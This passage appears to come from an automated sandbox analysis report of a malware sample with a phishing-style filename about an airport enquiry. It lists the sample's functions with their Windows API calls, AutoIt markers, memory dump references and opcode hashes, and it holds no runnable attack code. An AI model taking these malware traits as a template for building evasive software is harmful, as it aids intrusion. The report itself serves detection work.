              • Part of subcall function 00CA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00CA9C64), ref: 00CA2FA9
              • Part of subcall function 00CA2F95: GetLastError.KERNEL32(00000000,?,00CA9C64), ref: 00CA2FBB
            • _free.LIBCMT ref: 00CE99A6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
            • String ID:
            • API String ID: 1552873950-0
            • Opcode ID: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
            • Instruction ID: 5e5345e2bbdf6fd9360ca3334fd7d9fabc3bf92ecb08c8c73c094b6d7240690d
            • Opcode Fuzzy Hash: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
            • Instruction Fuzzy Hash: C0515DB1904258AFDF249F65CC81A9EBBB9EF48314F1044AEF609A7281DB715E80DF58
            Function 00CA493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
            • String ID:
            • API String ID: 2782032738-0
            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
            • Instruction ID: d65ed98dbd478796854fd81c24ae378e1a6a84241bdbe598ec534898a1e75e9c
            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
            • Instruction Fuzzy Hash: 6541D5716007079BDF2CCEB9C8809AF77AAEFC6368B24813DE865C7640D7B09E519B44
            Function 00C84531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00C84560
              • Part of subcall function 00C8410D: _memset.LIBCMT ref: 00C8418D
              • Part of subcall function 00C8410D: _wcscpy.LIBCMT ref: 00C841E1
              • Part of subcall function 00C8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C841F1
            • KillTimer.USER32(?,00000001,?,?), ref: 00C845B5
            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C845C4
            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CBD6CE
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
            • String ID:
            • API String ID: 1378193009-0
            • Opcode ID: f549f63d42a494fce7d4f3f1dab63ddf1910bfa8523381888e6f78e0fe0a9a1b
            • Instruction ID: bb516c27ea6e2bf1f5d1775c8fa3fa36b0e7a52db538ad59d79ddeac1f3ae849
            • Opcode Fuzzy Hash: f549f63d42a494fce7d4f3f1dab63ddf1910bfa8523381888e6f78e0fe0a9a1b
            • Instruction Fuzzy Hash: 5821F970904784AFEB329B24DC55BEBBBEC9F01308F04049EE69E96241D7B45B84DB55
            Function 00C873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CBEE62
            • GetOpenFileNameW.COMDLG32(?), ref: 00CBEEAC
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
              • Part of subcall function 00CA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CA09F4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Name$Path$FileFullLongOpen_memset
            • String ID: X
            • API String ID: 3777226403-3081909835
            • Opcode ID: 4e7ed098e6cba11840c26bd49f224b14ef6e46d542b42e2c8a912021ae893910
            • Instruction ID: 3c6a38bbbfe27b8a75565c7e7db1c73c347137b8095bc6ec898afb80d2fe69e1
            • Opcode Fuzzy Hash: 4e7ed098e6cba11840c26bd49f224b14ef6e46d542b42e2c8a912021ae893910
            • Instruction Fuzzy Hash: 7921C670A002989BCB11EF94C845BEEBBF89F49718F10405AE408E7381DBF499499FA5
            Function 00CE901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __fread_nolock_memmove
            • String ID: EA06
            • API String ID: 1988441806-3962188686
            • Opcode ID: ee3653eb8539f7f8f3cab78838e3d8676243ce99fd6a98a9f3d16ff0da362189
            • Instruction ID: 8f6b9e24fb01f364b02b251d1f94e9b68c4637ad4f7298e100ae77f3cbad5efa
            • Opcode Fuzzy Hash: ee3653eb8539f7f8f3cab78838e3d8676243ce99fd6a98a9f3d16ff0da362189
            • Instruction Fuzzy Hash: F701F9719042586EDB28C7A9C81AEEE7BF8DB05305F00819AF552D2181E579AB089760
            Function 00CE9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
            Download Yara Rule
            APIs
            • GetTempPathW.KERNEL32(00000104,?), ref: 00CE9B82
            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CE9B99
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Temp$FileNamePath
            • String ID: aut
            • API String ID: 3285503233-3010740371
            • Opcode ID: e9d858fb727333dc156bb98197f414e4312f5fdb8d9bc4b998ad190b0c095e49
            • Instruction ID: 5333bc204c87b338024b3b14f0ddedd8d56c8edcf2cc9ceda19a80f68641a678
            • Opcode Fuzzy Hash: e9d858fb727333dc156bb98197f414e4312f5fdb8d9bc4b998ad190b0c095e49
            • Instruction Fuzzy Hash: 00D05E7A54030DABDB209BA4EC0EF9A772CE704704F0042A1BE98D11A1DEB065988BA5
            Function 00CFCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 534bcc266ea24733e09a63af6039681a77f20353e19b3dd7c5d6c626a655e5ed
            • Instruction ID: 8d1143dbef3b9657489b03656897cd2a271b364935381bc8dfd36fd610cbea8a
            • Opcode Fuzzy Hash: 534bcc266ea24733e09a63af6039681a77f20353e19b3dd7c5d6c626a655e5ed
            • Instruction Fuzzy Hash: C0F15A70A083059FC754DF28C480A6ABBE5FF88314F14892EF99A9B351DB31E945CF82
            Function 00C8F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CA03D3
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00CA03DB
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CA03E6
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CA03F1
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00CA03F9
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00CA0401
              • Part of subcall function 00C96259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C8FA90), ref: 00C962B4
            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C8FB2D
            • OleInitialize.OLE32(00000000), ref: 00C8FBAA
            • CloseHandle.KERNEL32(00000000), ref: 00CC49F2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
            • String ID:
            • API String ID: 1986988660-0
            • Opcode ID: 86c755f68724e75697e35c403d88aba3575559af1fc3a00ef46360ead7fe5402
            • Instruction ID: 1a36961c37d6c9af7e6806ca7277f36c7f5053c74f0fc87f280f8d5c3bbe2daa
            • Opcode Fuzzy Hash: 86c755f68724e75697e35c403d88aba3575559af1fc3a00ef46360ead7fe5402
            • Instruction Fuzzy Hash: D78198B89093908FCB84EF79E9486557AE4EB8B718314852AD11FC7762EB31C445CF36
            Function 00C843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00C84401
            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C844A6
            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C844C3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconNotifyShell_$_memset
            • String ID:
            • API String ID: 1505330794-0
            • Opcode ID: bf2e28c286e053b1dfae083e9015edd163a8c0bc7f30a245ff9ef5f740ea5935
            • Instruction ID: 95be8202c53e90b6cf4c04b8adcefe5c78ce39d0ee9e2874d47d490ef99fd512
            • Opcode Fuzzy Hash: bf2e28c286e053b1dfae083e9015edd163a8c0bc7f30a245ff9ef5f740ea5935
            • Instruction Fuzzy Hash: CE3164B15057119FD724EF24D88479BBBE4FB49308F00092EF59AC3351D7B5AA44CB5A
            Function 00CA594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • __FF_MSGBANNER.LIBCMT ref: 00CA5963
              • Part of subcall function 00CAA3AB: __NMSG_WRITE.LIBCMT ref: 00CAA3D2
              • Part of subcall function 00CAA3AB: __NMSG_WRITE.LIBCMT ref: 00CAA3DC
            • __NMSG_WRITE.LIBCMT ref: 00CA596A
              • Part of subcall function 00CAA408: GetModuleFileNameW.KERNEL32(00000000,00D443BA,00000104,?,00000001,00000000), ref: 00CAA49A
              • Part of subcall function 00CAA408: ___crtMessageBoxW.LIBCMT ref: 00CAA548
              • Part of subcall function 00CA32DF: ___crtCorExitProcess.LIBCMT ref: 00CA32E5
              • Part of subcall function 00CA32DF: ExitProcess.KERNEL32 ref: 00CA32EE
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            • RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,00CA1013,?), ref: 00CA598F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
            • String ID:
            • API String ID: 1372826849-0
            • Opcode ID: af34b5da43ea6445b210703a6d8e8dee27930ade4fd65dd0140212c31fbd2a09
            • Instruction ID: 8c5127d42f61a43d6d727258e01e64ba1be0910b9413059ef602abf763d07dc7
            • Opcode Fuzzy Hash: af34b5da43ea6445b210703a6d8e8dee27930ade4fd65dd0140212c31fbd2a09
            • Instruction Fuzzy Hash: 1D01D235600B17DFE6212B35E852B6F72588F4377CF10402AF510EE2C1DB709E42A665
            Function 00CE9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CE97D2,?,?,?,?,?,00000004), ref: 00CE9B45
            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CE9B5B
            • CloseHandle.KERNEL32(00000000,?,00CE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CE9B62
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: File$CloseCreateHandleTime
            • String ID:
            • API String ID: 3397143404-0
            • Opcode ID: 2445cc6a49a86878fca4faae8920bf503396a83e8d0d2f6247a826fb406a07d9
            • Instruction ID: fd8f7bfd6a2db746e50ea83eb1ce403f10812533c8c16b4b513f644a2a0ae31c
            • Opcode Fuzzy Hash: 2445cc6a49a86878fca4faae8920bf503396a83e8d0d2f6247a826fb406a07d9
            • Instruction Fuzzy Hash: 28E08632580314B7D7311B55EC09FCA7B18EB05B71F204120FB28A91E087B1261197A9
            Function 00CE8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00CE8FA5
              • Part of subcall function 00CA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00CA9C64), ref: 00CA2FA9
              • Part of subcall function 00CA2F95: GetLastError.KERNEL32(00000000,?,00CA9C64), ref: 00CA2FBB
            • _free.LIBCMT ref: 00CE8FB6
            • _free.LIBCMT ref: 00CE8FC8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
            • Instruction ID: c94c24bd8feaa1e311fe697fa08c3ffeda2b5477fd127a55d02bda3e739a8d78
            • Opcode Fuzzy Hash: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
            • Instruction Fuzzy Hash: AFE0C2A13087224ECA20A5FDAD00A8327EE0F48350708080DB41DDB142CE24E940A028
            Function 00C8AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: CALL
            • API String ID: 0-4196123274
            • Opcode ID: a613f741453953a7907cda4a6c330a2b12e40e59a485a841ceaa3af3d5a91a57
            • Instruction ID: a7dfb2ce4620c5ea5db82dac6cb71ae6066d9dbf4a26162e2fb98466c366f554
            • Opcode Fuzzy Hash: a613f741453953a7907cda4a6c330a2b12e40e59a485a841ceaa3af3d5a91a57
            • Instruction Fuzzy Hash: BC225974508201CFD724EF14C494B6ABBE1FF45308F29895EE8968B362D731ED81DB86
            Function 00C84DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID: EA06
            • API String ID: 4104443479-3962188686
            • Opcode ID: 8b0272045b2139b13c403241c4cf42492645820b36737885fe90f48f42f16cb8
            • Instruction ID: 82f17be50732b1a8439e570af999008a45ebcfb0c8555442d7cccb5a67061668
            • Opcode Fuzzy Hash: 8b0272045b2139b13c403241c4cf42492645820b36737885fe90f48f42f16cb8
            • Instruction Fuzzy Hash: 09418F31A046695BCF29BB64C8517BFFFA6AB0130CF284079FC829B182D6718E4497E5
            Function 00C8492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
            Download Yara Rule
            APIs
            • IsThemeActive.UXTHEME ref: 00C84992
              • Part of subcall function 00CA35AC: __lock.LIBCMT ref: 00CA35B2
              • Part of subcall function 00CA35AC: DecodePointer.KERNEL32(00000001,?,00C849A7,00CD81BC), ref: 00CA35BE
              • Part of subcall function 00CA35AC: EncodePointer.KERNEL32(?,?,00C849A7,00CD81BC), ref: 00CA35C9
              • Part of subcall function 00C84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C84A73
              • Part of subcall function 00C84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C84A88
              • Part of subcall function 00C83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C83B7A
              • Part of subcall function 00C83B4C: IsDebuggerPresent.KERNEL32 ref: 00C83B8C
              • Part of subcall function 00C83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D462F8,00D462E0,?,?), ref: 00C83BFD
              • Part of subcall function 00C83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00C83C81
            • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00C849D2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
            • String ID:
            • API String ID: 1438897964-0
            • Opcode ID: 0dd2fd39e65414d0ecb35d9b77f7ba24f1c136185e7e7bfaea98a8af3ddd0972
            • Instruction ID: 26025ee85e5582dba2661fcf534f50aac5444cbea318e8398a4ea1d6262d9193
            • Opcode Fuzzy Hash: 0dd2fd39e65414d0ecb35d9b77f7ba24f1c136185e7e7bfaea98a8af3ddd0972
            • Instruction Fuzzy Hash: 6211AC71908301ABC700EF68EC8591ABBE8EB96714F00451EF046C33B1DBB09648DBAA
            Function 00C85DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00C85981,?,?,?,?), ref: 00C85E27
            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00C85981,?,?,?,?), ref: 00CBE19C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 5dceecb61778df78869f700ca9e1cd62f180ad729c97b36ec372906b13faf4e9
            • Instruction ID: 1bc03c113ad2f91f9876bec40130a52e780187d1d4dd537ed298a9e144cbd318
            • Opcode Fuzzy Hash: 5dceecb61778df78869f700ca9e1cd62f180ad729c97b36ec372906b13faf4e9
            • Instruction Fuzzy Hash: 14017970644708BEF7245E24CC86FA6379CEB0576CF108319BAF55A1E0C6F45E498B54
            Function 00CA0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00CA594C: __FF_MSGBANNER.LIBCMT ref: 00CA5963
              • Part of subcall function 00CA594C: __NMSG_WRITE.LIBCMT ref: 00CA596A
